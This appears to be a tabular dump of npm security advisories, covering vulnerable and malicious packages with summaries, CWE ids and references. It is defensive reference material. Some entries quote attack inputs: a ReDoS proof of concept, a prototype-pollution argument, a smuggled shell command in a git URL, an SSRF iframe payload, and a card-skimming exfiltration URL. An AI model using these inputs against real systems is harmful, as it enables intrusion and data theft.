ecosystem
stringclasses 14
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
267
⌀ | details
stringlengths 9
13.5k
| aliases
stringlengths 17
144
⌀ | modified_date
stringdate 2010-05-27 05:47:00
2022-05-10 08:46:52
| published_date
stringdate 2005-12-31 05:00:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 988
values | refs
stringlengths 30
17.7k
⌀ | introduced
stringlengths 75
4.26k
⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
npm
|
GHSA-4448-rc82-fcr7
|
Path Traversal in serve-here.js
|
Versions of serve-here.js prior to 1.2.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.
|
{'CVE-2019-5444'}
|
2021-09-22T18:40:39Z
|
2021-09-22T18:40:57Z
|
MODERATE
| null |
{'CWE-22'}
|
{'https://hackerone.com/reports/569966', 'https://github.com/ChristoPy/serve-here.js', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5444', 'https://www.npmjs.com/advisories/1019'}
| null |
npm
|
GHSA-3q6f-8grx-pr4v
|
Cross-site scripting in jspdf
|
"It's possible to use nested script tags in order to bypass the filtering regex."
|
{'CVE-2020-7691'}
|
2021-04-09T17:33:02Z
|
2021-05-11T16:43:52Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7691', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-575255', 'https://snyk.io/vuln/SNYK-JS-JSPDF-568273', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-575253', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-575254', 'https://github.com/MrRio/jsPDF/issues/2971', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575252', 'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d'}
| null |
npm
|
GHSA-j899-348x-h3rq
|
Malicious Package in serializes
|
This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
## Recommendation
Remove the package from your environment. There are no indications of further compromise.
| null |
2021-09-30T20:27:53Z
|
2020-09-03T19:57:54Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1139'}
| null |
npm
|
GHSA-pjmx-9xr3-82qr
|
ReDoS via long UserAgent header in useragent
|
Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.
## Proof of Concept
```
var useragent = require('useragent');
var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```
## Recommendation
Update to version 2.1.13 or later.
|
{'CVE-2017-16030'}
|
2020-08-31T18:18:52Z
|
2018-07-24T19:59:13Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://www.npmjs.com/advisories/312', 'https://github.com/advisories/GHSA-pjmx-9xr3-82qr', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16030', 'https://nodesecurity.io/advisories/312'}
| null |
npm
|
GHSA-9p2w-rmx4-9mw7
|
Command Injection in strapi
|
Versions of `strapi` before 3.0.0-beta.17.8 are vulnerable to Command Injection. The package fails to sanitize plugin names in the `/admin/plugins/install/` route. This may allow an authenticated attacker with admin privileges to run arbitrary commands in the server.
## Recommendation
Upgrade to version 3.0.0-beta.17.8 or later
| null |
2021-10-04T19:12:12Z
|
2020-09-04T16:54:02Z
|
HIGH
| null |
{'CWE-77'}
|
{'https://github.com/strapi/strapi', 'https://www.npmjs.com/advisories/1424'}
| null |
npm
|
GHSA-m5p4-7wf9-6w99
|
Malicious Package in regenrator
|
All versions of `regenrator` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
## Recommendation
This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.
| null |
2021-10-01T13:29:07Z
|
2020-09-01T21:10:53Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/685'}
| null |
npm
|
GHSA-8jjf-w7j6-323c
|
Authentication Bypass in samlify
|
Versions of `samlify` prior to 2.4.0 are vulnerable to Authentication Bypass. The package fails to prevent XML Signature Wrapping, allowing tokens to be reused with different usernames. A remote attacker can modify SAML content for a SAML service provider without invalidating the cryptographic signature, which may allow attackers to bypass primary authentication for the affected SAML service provider.
## Recommendation
Upgrade to version 2.4.0 or later
|
{'CVE-2017-1000452'}
|
2021-09-07T19:47:54Z
|
2018-01-04T21:03:33Z
|
HIGH
| null |
{'CWE-91'}
|
{'https://www.npmjs.com/advisories/969', 'https://www.whitehats.nl/blog/xml-signature-wrapping-samlify', 'https://github.com/tngan/samlify', 'https://github.com/advisories/GHSA-8jjf-w7j6-323c', 'https://hackerone.com/reports/356284', 'https://github.com/tngan/samlify/releases/tag/v2.3.0', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000452'}
| null |
npm
|
GHSA-49q3-8867-5wmp
|
Remote Command Execution in reg-keygen-git-hash-plugin
|
### Impact
`reg-keygen-git-hash-plugin` through 0.10.15 allow remote attackers to execute of arbitrary commands.
### Patches
Upgrade to version 0.10.16 or later.
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [reg-viz/reg-suit](https://github.com/reg-viz/reg-suit)
|
{'CVE-2021-32673'}
|
2021-06-08T15:31:31Z
|
2021-06-08T18:47:06Z
|
HIGH
| null |
{'CWE-94', 'CWE-78'}
|
{'https://github.com/reg-viz/reg-suit/commit/f84ad9c7a22144d6c147dc175c52756c0f444d87', 'https://github.com/reg-viz/reg-suit/releases/tag/v0.10.16', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32673', 'https://www.npmjs.com/package/reg-keygen-git-hash-plugin', 'https://github.com/reg-viz/reg-suit/security/advisories/GHSA-49q3-8867-5wmp'}
| null |
npm
|
GHSA-wh69-wc6q-7888
|
Command injection in node-dns-sync
|
dns-sync through 0.2.0 allows execution of arbitrary commands . This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
|
{'CVE-2020-11079'}
|
2021-11-04T17:08:10Z
|
2020-05-28T18:42:59Z
|
HIGH
| null |
{'CWE-77', 'CWE-94'}
|
{'https://github.com/skoranga/node-dns-sync', 'https://github.com/skoranga/node-dns-sync/commit/cb10a5ac7913eacc031ade7d91596277f31645dc', 'https://github.com/skoranga/node-dns-sync/security/advisories/GHSA-wh69-wc6q-7888', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11079'}
| null |
npm
|
GHSA-884p-74jh-xrg2
|
Command Injection in tree-kill
|
Versions of `tree-kill` prior to 1.2.2 are vulnerable to Command Injection. The package fails to sanitize values passed to the `kill` function. If this value is user-controlled it may allow attackers to run arbitrary commands in the server. The issue only affects Windows systems.
## Recommendation
Upgrade to version 1.2.2 or later.
| null |
2020-08-31T18:59:05Z
|
2020-09-04T16:57:20Z
|
HIGH
| null |
{'CWE-77'}
|
{'https://www.npmjs.com/advisories/1432', 'https://hackerone.com/reports/701183'}
| null |
npm
|
GHSA-97m3-w2cp-4xx6
|
Embedded Malicious Code in node-ipc
|
The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3.
|
{'CVE-2022-23812'}
|
2022-03-25T19:58:47Z
|
2022-03-16T23:54:32Z
|
CRITICAL
| null |
{'CWE-506', 'CWE-94'}
|
{'https://github.com/RIAEvangelist/node-ipc', 'https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370', 'https://security.netapp.com/advisory/ntap-20220407-0005/', 'https://github.com/RIAEvangelist/node-ipc/issues/236', 'https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580', 'https://github.com/RIAEvangelist/node-ipc/issues/233', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23812', 'https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js'}
| null |
npm
|
GHSA-r9q4-w3fm-wrm2
|
Cross-Site Scripting in google-closure-library
|
Versions of `google-closure-library` prior to 20190301.0.0 are vulnerable to Cross-Site Scripting. The `safedomtreeprocessor.processToString()` function improperly processed empty elements, which could allow attackers to execute arbitrary JavaScript through Mutation Cross-Site Scripting.
## Recommendation
Upgrade to version 20190301.0.0 or later.
| null |
2021-09-27T21:01:47Z
|
2020-09-02T21:21:43Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa#commitcomment-33294853', 'https://github.com/google/closure-library', 'https://snyk.io/vuln/SNYK-JS-GOOGLECLOSURELIBRARY-174519', 'https://www.npmjs.com/advisories/878'}
| null |
npm
|
GHSA-hxwm-x553-x359
|
Arbitrary Command Injection due to Improper Command Sanitization
|
### Summary
There exists a command injection vulnerability in `npmcli/git` versions <2.0.8 which may result in arbitrary shell command execution due to improper argument sanitization when `npmcli/git` is used to execute Git commands based on user controlled input.
The impact of this issue is possible Arbitrary Command Injection when `npmcli/git` is run with untrusted (user controlled) Git command arguments.
### Impact
Arbitrary Command Injection
### Details
`npmcli/git` prior to release `2.0.8` passed user controlled input as arguments to a shell command without properly sanitizing this input. Passing unsanitized input to a shell can lead to arbitrary command injection. For example passing `git+https://github.com/npm/git; echo hello world` would trigger the shell execution of `echo hello world`.
This issue was remediated by no longer running `npmcli/git` git commands through an intermediate shell.
### Patches
This issue has been patched in release `2.0.8`
### Acknowledgements
This report was reported to us by @tyage (Ierae Security) through the [GitHub Bug Bounty Program](https://bounty.github.com).
| null |
2021-08-02T19:02:32Z
|
2021-08-05T17:07:39Z
|
MODERATE
| null |
{'CWE-78'}
|
{'https://github.com/npm/git/security/advisories/GHSA-hxwm-x553-x359', 'https://github.com/npm/git/pull/29'}
| null |
npm
|
GHSA-c427-hjc3-wrfw
|
Cross-site scripting in Swagger-UI
|
A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method.
|
{'CVE-2019-17495'}
|
2022-02-08T22:07:47Z
|
2019-10-15T19:27:05Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r853ffeb915a400f899de78124d4e0d77a19379d2e11bf8f4e98c624f@%3Ccommits.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r3acb7e494cf1aab99b6784b7c5bbddfd0d4f8a484ab534c3a61ef9cf@%3Ccommits.airflow.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://github.com/swagger-api/swagger-ui', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17495', 'https://lists.apache.org/thread.html/ref70b940c4f69560d29d6ba792d6c82865e74de3dcad4c92d99b1f8f@%3Ccommits.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r103579b01da2d0aa0f672b88f811224bbf8ef493aaad845895955e91@%3Ccommits.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r84b327f7a8b6b28857b906c07a66dd98e1d341191fa8d7816514ef96@%3Ccommits.airflow.apache.org%3E', 'https://github.com/tarantula-team/CSS-injection-in-Swagger-UI'}
| null |
npm
|
GHSA-hxhm-3vj9-6cqh
|
Downloads Resources over HTTP in apk-parser2
|
Affected versions of `apk-parser2` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `apk-parser2`.
## Recommendation
No patch is currently available for this vulnerability, and the package has not been updated since 2014.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10632'}
|
2021-01-08T18:38:52Z
|
2018-09-18T13:49:31Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10632', 'https://www.npmjs.com/advisories/223', 'https://github.com/advisories/GHSA-hxhm-3vj9-6cqh', 'https://nodesecurity.io/advisories/223'}
| null |
npm
|
GHSA-6879-xr95-5gf4
|
Malicious Package in malicious-do-not-install
|
All versions of `malicious-do-not-install` contain malicious code. The package copies the contents of `/etc/passwd` and `/etc/shadow` to files in the local `/tmp/` folder.
## Recommendation
Remove the package from your environment and rotate affected credentials.
| null |
2021-09-30T17:16:35Z
|
2020-09-03T17:20:15Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1040'}
| null |
npm
|
GHSA-w8xh-93qh-35vw
|
Unrestricted Upload of File with Dangerous Type in Payload
|
An arbitrary file upload vulnerability in the file upload module of PayloadCMS v0.15.0 allows attackers to execute arbitrary code via a crafted SVG file.
|
{'CVE-2022-27952'}
|
2022-04-22T20:28:59Z
|
2022-04-13T00:00:22Z
|
CRITICAL
| null |
{'CWE-434'}
|
{'https://www.youtube.com/watch?v=6CfhAxA3xdQ', 'https://github.com/payloadcms/payload', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27952'}
| null |
npm
|
GHSA-m8fm-mv5w-33pv
|
Command Injection in psnode
|
This affects all current versions of package psnode. If attacker-controlled user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.
|
{'CVE-2021-23375'}
|
2021-04-19T21:25:43Z
|
2021-05-06T15:52:59Z
|
HIGH
| null |
{'CWE-77'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23375', 'https://github.com/nrako/psnode/blob/076f623689e4506d3647505daca13b3f482e0c31/lib/index.js%23L59', 'https://www.npmjs.com/package/psnode', 'https://snyk.io/vuln/SNYK-JS-PSNODE-1078543'}
| null |
npm
|
GHSA-m8pw-h8qj-rgj9
|
Downloads Resources over HTTP in ipip-coffee
|
Affected versions of `ipip-coffee` insecurely download resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. This could impact the integrity and availability of the data being used to make geolocation decisions by an application.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10673'}
|
2021-01-08T18:29:02Z
|
2019-02-18T23:44:24Z
|
MODERATE
| null |
{'CWE-311'}
|
{'https://github.com/advisories/GHSA-m8pw-h8qj-rgj9', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10673', 'https://nodesecurity.io/advisories/279', 'https://www.npmjs.com/advisories/279'}
| null |
npm
|
GHSA-629c-j867-3v45
|
Malicious Package in bitcoisnj-lib
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:43:02Z
|
2020-09-04T16:41:04Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1367'}
| null |
npm
|
GHSA-rggq-f2wf-m6cp
|
Malicious Package in jajajejejiji
|
All versions of `jajajejejiji` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
## Recommendation
Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
| null |
2021-10-01T13:44:23Z
|
2020-09-02T18:31:08Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/838'}
| null |
npm
|
GHSA-hv4w-jhcj-6wfw
|
Cross-Site Scripting in snekserve
|
All versions of `snekserve` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2020-08-31T18:49:43Z
|
2020-09-03T20:34:23Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/1167'}
| null |
npm
|
GHSA-4p24-vmcr-4gqj
|
XSS vulnerability that affects bootstrap
|
In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute. Note that this is a different vulnerability than CVE-2018-14041.
See https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0/ for more info.
|
{'CVE-2016-10735'}
|
2021-07-26T21:48:49Z
|
2019-01-17T13:57:27Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/twbs/bootstrap/issues/20184', 'https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906', 'https://github.com/twbs/bootstrap/pull/23687', 'https://github.com/advisories/GHSA-4p24-vmcr-4gqj', 'https://access.redhat.com/errata/RHSA-2020:0132', 'https://access.redhat.com/errata/RHBA-2019:1570', 'https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0/', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10735', 'https://access.redhat.com/errata/RHSA-2019:3023', 'https://github.com/twbs/bootstrap/pull/23679', 'https://access.redhat.com/errata/RHBA-2019:1076', 'https://access.redhat.com/errata/RHSA-2020:0133', 'https://github.com/twbs/bootstrap/pull/26460', 'https://access.redhat.com/errata/RHSA-2019:1456'}
| null |
npm
|
GHSA-qmgf-fp85-55gr
|
Malicious Package in bitcionjs
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:39:27Z
|
2020-09-04T15:40:34Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1360'}
| null |
npm
|
GHSA-j28q-p8ww-cp87
|
Prototype Pollution in merge-deep2.
|
All versions of package merge-deep2 are vulnerable to Prototype Pollution via the mergeDeep() function.
|
{'CVE-2021-23700'}
|
2021-12-15T15:23:03Z
|
2021-12-16T14:33:09Z
|
MODERATE
| null |
{'CWE-1321'}
|
{'https://snyk.io/vuln/SNYK-JS-MERGEDEEP2-1727593', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23700', 'https://github.com/luyuan/merge-deep'}
| null |
npm
|
GHSA-8549-p68h-m9mc
|
Malicious Package in buffdr-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T20:57:14Z
|
2020-09-03T21:46:21Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1237'}
| null |
npm
|
GHSA-xm28-fw2x-fqv2
|
Denial of Service in foreman
|
All versions of `foreman` are vulnerable to Regular Expression Denial of Service when requests to it are made with a specially crafted path.
## Recommendation
Upgrade to version 3.0.1.
| null |
2021-08-04T21:19:17Z
|
2019-05-31T23:08:14Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://www.npmjs.com/advisories/645', 'https://snyk.io/vuln/npm:foreman:20180429', 'https://github.com/strongloop/node-foreman/blob/v2.0.0/forward.js#L30', 'https://hackerone.com/reports/320586', 'https://nodesecurity.io/advisories/645'}
| null |
npm
|
GHSA-w4v7-hwx7-9929
|
Cross-site Scripting in tempura
|
This affects the package tempura before 0.4.0. If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.
|
{'CVE-2021-23784'}
|
2021-11-08T17:49:56Z
|
2021-11-08T17:50:10Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/lukeed/tempura/commit/58a5c3671e2f36b26810e77ead9e0dd471902f9b', 'https://snyk.io/vuln/SNYK-JS-TEMPURA-1569633', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23784', 'https://github.com/lukeed/tempura/releases/tag/v0.4.0', 'https://github.com/lukeed/tempura'}
| null |
npm
|
GHSA-7xfq-xh6v-4mrm
|
Malicious Package in json-serializer
|
Version 2.0.10 of `json-serializer` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
If version 2.0.10 of this module is found installed you will want to replace it with a version before or after 2.0.10. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
| null |
2021-10-01T13:10:41Z
|
2020-09-01T20:27:53Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/630'}
| null |
npm
|
GHSA-p9pc-299p-vxgp
|
Prototype Pollution in yargs-parser
|
Affected versions of `yargs-parser` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument `--foo.__proto__.bar baz'` adds a `bar` property with value `baz` to all objects. This is only exploitable if attackers have control over the arguments being passed to `yargs-parser`.
## Recommendation
Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.
|
{'CVE-2020-7608'}
|
2021-07-28T21:26:24Z
|
2020-09-04T18:00:54Z
|
MODERATE
| null |
{'CWE-915'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7608', 'https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2', 'https://snyk.io/vuln/SNYK-JS-YARGSPARSER-560381', 'https://www.npmjs.com/advisories/1500'}
| null |
npm
|
GHSA-84fv-prrc-5ggr
|
Route Validation Bypass in call
|
Affected versions of `call` do not validate empty parameters, which may result in a bypass of route validation rules.
## Proof of Concept
Routing Scheme:
```
/api/{param}/{param2}/details
```
Triggering Request Path:
```
/api///
```
## Recommendation
Update to version 3.0.2 or later.
|
{'CVE-2016-10543'}
|
2020-08-31T18:11:30Z
|
2019-02-18T23:40:04Z
|
MODERATE
| null |
{'CWE-20'}
|
{'https://github.com/advisories/GHSA-84fv-prrc-5ggr', 'https://nodesecurity.io/advisories/121', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10543', 'https://github.com/hapijs/hapi/issues/3228', 'https://www.npmjs.com/advisories/121'}
| null |
npm
|
GHSA-gpvr-g6gh-9mc2
|
No Charset in Content-Type Header in express
|
Vulnerable versions of express do not specify a charset field in the content-type header while displaying 400 level response messages. The lack of enforcing user's browser to set correct charset, could be leveraged by an attacker to perform a cross-site scripting attack, using non-standard encodings, like UTF-7.
## Recommendation
For express 3.x, update express to version 3.11 or later.
For express 4.x, update express to version 4.5 or later.
|
{'CVE-2014-6393'}
|
2021-08-02T22:35:12Z
|
2018-10-23T17:22:54Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://nodesecurity.io/advisories/express-no-charset-in-content-type-header', 'https://github.com/advisories/GHSA-gpvr-g6gh-9mc2', 'https://bugzilla.redhat.com/show_bug.cgi?id=1203190', 'https://nvd.nist.gov/vuln/detail/CVE-2014-6393', 'https://www.npmjs.com/advisories/8'}
| null |
npm
|
GHSA-6677-83pp-f862
|
Cross-Site Scripting in @nuxt/devalue
|
Versions of `@nuxt/devalue` prior to 1.2.3 are vulnerable to Cross-Site Scripting. Due to insufficient input sanitization attacker may inject arbitrary JavaScript code through object keys.
## Recommendation
Upgrade to version 1.2.3 or later.
|
{'CVE-2019-13506'}
|
2021-08-17T18:13:29Z
|
2019-07-16T00:42:02Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/nuxt/nuxt.js/compare/c0776eb...8d14cd4', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13506', 'https://github.com/nuxt/nuxt.js/releases/tag/v2.6.2', 'https://github.com/nuxt/devalue/pull/8', 'https://github.com/nuxt/nuxt.js/commit/0d5dfe71917191c5b07f373896311f2d8f6b75be', 'https://www.npmjs.com/advisories/814', 'https://github.com/Rich-Harris/devalue/issues/19', 'https://github.com/nuxt/devalue/releases/tag/v1.2.3'}
| null |
npm
|
GHSA-m4fq-xh7w-jhfm
|
Malicious Package in crytpo-js
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T21:00:29Z
|
2020-09-03T19:39:46Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1391'}
| null |
npm
|
GHSA-vjfr-p6hp-jqqw
|
Command Injection in ungit
|
Versions of `ungit` prior to 0.9.0 are affected by a command injection vulnerability in the `url` parameter.
## Recommendation
Update version 0.9.0 or later.
|
{'CVE-2015-4130'}
|
2021-09-23T21:01:14Z
|
2020-08-31T23:00:10Z
|
CRITICAL
| null |
{'CWE-77'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2015-4130', 'https://www.npmjs.com/advisories/40', 'https://github.com/FredrikNoren/ungit', 'https://github.com/FredrikNoren/ungit/issues/486'}
| null |
npm
|
GHSA-xfrc-7mj2-5xh9
|
Undefined Behavior in zencashjs
|
Versions of `zencashjs` prior to 1.2.0 may cause loss of funds when used with cryptocurrency wallets. The package relies on a string comparison of the first two characters of a Horizen address to determine the destination address type of a transaction (P2PKH or P2SH). Due to the base58 address prefixes chosen in Horizen there exists the possibility of a clash of address prefixes for testnet P2PKH and mainnet P2SH addresses, testnet P2PKH addresses start with “zt” while a subset of mainnet P2SH addresses can also start with “zt”. The package interprets transactions sent to a “zt” P2SH address on mainnet as P2PKH transactions erroneously. Any funds sent to a mainnet P2SH multisignature address starting with “zt” will be sent to the wrong address and be lost.
## Recommendation
Upgrade to version 1.2.0 or later.
| null |
2020-08-31T18:44:53Z
|
2020-09-03T17:14:51Z
|
CRITICAL
| null | null |
{'https://www.npmjs.com/advisories/1035', 'https://github.com/ZencashOfficial/zencashjs/commit/db01bd94b9f8a956d7835e934500eaa643f8bd13#diff-42d8d2088a96641b563b25ad908b0c0fR146'}
| null |
npm
|
GHSA-wgvj-6v57-wjh3
|
Malicious Package in bowee
|
Version 1.8.4 of `bowee` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T21:37:06Z
|
2020-09-02T21:30:14Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/897'}
| null |
npm
|
GHSA-mw35-24gh-f82w
|
High severity vulnerability that affects keycloak-connect and keycloak-js
|
It was found that the Keycloak Node.js adapter 2.5 - 3.0 did not handle invalid tokens correctly. An attacker could use this flaw to bypass authentication and gain access to restricted information, or to possibly conduct further attacks.
|
{'CVE-2017-7474'}
|
2020-06-16T21:47:26Z
|
2017-11-15T20:41:51Z
|
HIGH
| null |
{'CWE-253'}
|
{'http://rhn.redhat.com/errata/RHSA-2017-1203.html', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7474', 'https://bugzilla.redhat.com/show_bug.cgi?id=1445271'}
| null |
npm
|
GHSA-5p98-wpc9-g498
|
Server-Side Request Forgery in html-pdf-chrome
|
All versions of `html-pdf-chrome` are vulnerable to Server-Side Request Forgery (SSRF). The package executes HTTP requests if the parsed HTML contains external references to resources, such as `<iframe src="http://localhost" height="800px" width="800px"></iframe>`. This allows attackers to access resources through HTTP that are accessible to the server, including private resources in the hosting environment.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2021-10-01T20:12:12Z
|
2020-09-04T15:21:32Z
|
HIGH
| null |
{'CWE-918'}
|
{'https://github.com/westy92/html-pdf-chrome', 'https://github.com/westy92/html-pdf-chrome/issues/249', 'https://www.npmjs.com/advisories/1339'}
| null |
npm
|
GHSA-m2r3-8492-vx59
|
Denial of Service (DoS) in mongo-express
|
All versions of package mongo-express are vulnerable to Denial of Service (DoS) when exporting an empty collection as CSV, due to an unhandled exception, leading to a crash.
|
{'CVE-2021-23372'}
|
2021-10-06T15:13:57Z
|
2021-10-06T17:47:46Z
|
MODERATE
| null |
{'CWE-754'}
|
{'https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-1085403', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23372', 'https://github.com/mongo-express/mongo-express'}
| null |
npm
|
GHSA-fxwf-4rqh-v8g3
|
Insecure defaults due to CORS misconfiguration in socket.io
|
The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
|
{'CVE-2020-28481'}
|
2021-01-20T05:39:24Z
|
